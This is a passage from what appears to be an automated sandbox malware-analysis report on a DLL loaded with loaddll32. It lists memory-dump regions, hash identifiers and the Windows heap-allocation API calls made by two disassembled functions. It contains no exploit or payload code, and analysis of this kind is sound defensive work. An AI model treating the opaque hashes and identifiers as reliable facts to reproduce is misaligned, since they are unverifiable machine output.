                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                                                          • String ID:
                                                          • API String ID: 3289936468-0
                                                          • Opcode ID: 242f31426ad57f69496cf5a359c15a3d78e904203da98ddbbe90ee3972058db7
                                                          • Instruction ID: e5bcf6fcaf6474cf11c06b2f5d739369e89de0018cd217908e7742b1c919ccc1
                                                          • Opcode Fuzzy Hash: 242f31426ad57f69496cf5a359c15a3d78e904203da98ddbbe90ee3972058db7
                                                          • Instruction Fuzzy Hash: DB0180B5C04665AFE711DF188C44BEABFE8FB0AAA0F040656E995A3645C7345E028BE1
                                                          Function 100069B0 Relevance: 5.0, APIs: 4, Instructions: 18memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000000,?,?), ref: 100069C0
                                                          • HeapReAlloc.KERNEL32(00000000), ref: 100069C7
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 100069D5
                                                          • HeapAlloc.KERNEL32(00000000), ref: 100069DC
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 8467137ebeee5c80095378d21e104a4eec5c859026c898dd95d044c84a894ab9
                                                          • Instruction ID: 47877cb6062bd81062e19e0104322f8483190e017e00c23344b6b727d1ead73d
                                                          • Opcode Fuzzy Hash: 8467137ebeee5c80095378d21e104a4eec5c859026c898dd95d044c84a894ab9
                                                          • Instruction Fuzzy Hash: B6D04C75604212ABFE449BA8CD8DFAA7BADFB84745F058948F54DCA094C6709840DB31